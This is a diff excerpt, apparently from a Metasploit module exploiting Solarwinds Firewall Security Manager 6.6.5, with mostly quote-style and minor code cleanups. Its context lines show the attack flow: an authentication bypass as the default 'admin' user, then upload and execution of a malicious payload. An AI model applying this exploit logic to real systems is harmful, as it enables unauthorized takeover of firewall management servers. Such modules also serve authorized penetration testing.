@@ -54,12 +54,12 @@ def initialize(info={})
54
54
[ 'Solarwinds Firewall Security Manager 6.6.5' , { } ]
55
55
] ,
56
56
'Privileged' => false ,
57
- 'DisclosureDate' => " Mar 13 2015" ,
57
+ 'DisclosureDate' => ' Mar 13 2015' ,
58
58
'DefaultTarget' => 0 ) )
59
59
60
60
register_options (
61
61
[
62
- OptString . new ( 'TARGETURI' , [ true , " Base FMS directory path" , '/' ] )
62
+ OptString . new ( 'TARGETURI' , [ true , ' Base FMS directory path' , '/' ] )
63
63
] , self . class )
64
64
end
65
65
@@ -86,7 +86,7 @@ def exploit
86
86
# 'admin' is there by default and you can't delete it
87
87
username = 'admin'
88
88
print_status ( "Auth bypass: Putting session value: username=#{ username } " )
89
- sid = put_session_value ( 'admin' )
89
+ sid = put_session_value ( username )
90
90
print_status ( "Your SID is: #{ sid } " )
91
91
92
92
# Stage 2 of the attack
@@ -185,13 +185,13 @@ def upload_exec(sid, filename, malicious_file)
185
185
186
186
if !res
187
187
fail_with ( Failure ::Unknown , 'The connection timed out while uploading the malicious file.' )
188
- elsif res && res . body . include? ( 'java.lang.NoClassDefFoundError' )
189
- print_status ( " Payload being treated as XLS, indicates a successful upload." )
188
+ elsif res . body . include? ( 'java.lang.NoClassDefFoundError' )
189
+ print_status ( ' Payload being treated as XLS, indicates a successful upload.' )
190
190
else
191
- print_status ( " Unsure of a successful upload." )
191
+ print_status ( ' Unsure of a successful upload.' )
192
192
end
193
193
194
- print_status ( " Attempting to execute the payload." )
194
+ print_status ( ' Attempting to execute the payload.' )
195
195
exec_file ( sid , filename )
196
196
end
197
197
0 commit comments